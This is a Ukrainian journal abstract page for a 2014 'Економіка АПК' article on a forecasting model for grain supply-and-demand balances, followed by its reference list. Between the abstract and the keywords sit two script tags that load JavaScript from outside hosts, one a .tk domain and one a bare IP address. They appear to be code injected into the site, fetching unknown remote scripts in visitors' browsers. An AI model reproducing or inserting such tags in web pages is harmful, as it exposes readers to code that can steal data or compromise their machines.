ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.27/.439.053
Аграрний ринок

Прогнозна модель зернового балансу / Приходько Д. С., Сікачина О. В. // Економіка АПК. - 2014. - № 3 - С. 36

Визначено необхідність створення автоматизованої системи розрахунку прогнозних балансів зернових культур, що може забезпечити прозору й оперативну оцінку стану зернового ринку як вирішальної умови залучення інвестицій в український зерновий сектор, розширення зовнішніх ринків та забезпечення національної продовольчої безпеки. Розкрито методологічні підходи до формування прогнозних балансів зернових культур. Наведено алгоритми розрахунку таких статей прогнозних балансів, як виробництво, витрати насіння на сівбу, зміна запасів, втрати, продовольче споживання, переробка на нехарчові цілі, експорт-імпорт, кормове споживання, деякі специфічні балансові статті. Відзначено, що у запропонованій системі прогнозна оцінка показників зернового ринку розраховується переважно на основі офіційних джерел інформації. Дана система також містить показники, що характеризують рівень продовольчої безпеки у країні. Бібліогр.: 9.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: аграрний сектор, продовольча безпека, прогнозування, зернові культури, продовольчий баланс, ринок зерна

Список використаних джерел

  1. Финальная декларация саммита «Группы двадцати» в Каннах «Построение нашего общего будущего: возобновление коллективных действий для всеобщего блага» [Электронный ресурс]. – Режим доступа: http://www.ru.g20russia.ru/load/780984272.
  2. OECD – ФАО Agricultural Outlook 2013-2022 [Электронный ресурс]. – Режим доступа: http://www.oecd.org/site/oecd-ФАОagriculturaloutlook/.
  3. Инфраструктурное обеспечение экспорта зерновых грузов Украины, презентация Родиона Рыбчинского на расширенном заседании Рабочей группы по вопросам функционирования рынка зерна Украины при Минагрополитике Украины и Украинской зерновой ассоциации, 11 июля 2013 г, г. Одесса.
  4. United States Department of Agriculture, Foreign Agricultural Service [Электронный ресурс]. – Режим доступа: http://www.fas.usda.gov/psdonline/.
  5. Баланси сільськогосподарської продукції та продовольства / Наукове видання [ Лупенко Ю.О., Шпичак О.М., Месель-Веселяк В.Я. та ін.]. – К. : ННЦ ІАЕ, 2013. – 74 с.
  6. Аналіз і прогноз кон’юнктури світових ринків продукції рослинництва / [Шпичак О.М., Лупенко Ю.О., Присяжнюк М.В. та ін.] ; за ред. О.М. Шпичака. – К. : ННЦ ІАЕ, 2012. – 516 с.
  7. Prikhodko D., Prokopenko K. Methodology for Preparing Grain Supply and Demand Balance Forecasts / UKRAINE: Grain Sector Review and Public Private Policy Dialogue. Rome. ФАО – 2010. – P. 118–128.
  8. Интегрированная система «Прогнозирование балансов зерновых культур в Украине» [Электронный ресурс]. – Режим доступа: www.grainbalance.org.ua.
  9. Price Forecasting Techniques [Электронный ресурс]. – Режим доступа: https://www.google.com.ua/search?client=opera&q=forecast+grain+balance&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest#channel=suggest&psj=1&q=forecast+ grain+balance&start=10.
Читати статтю: 14_03_36-41.pdf
Читати переклад статті: 1403prykhodko_prokopenko_sikachyna.pdf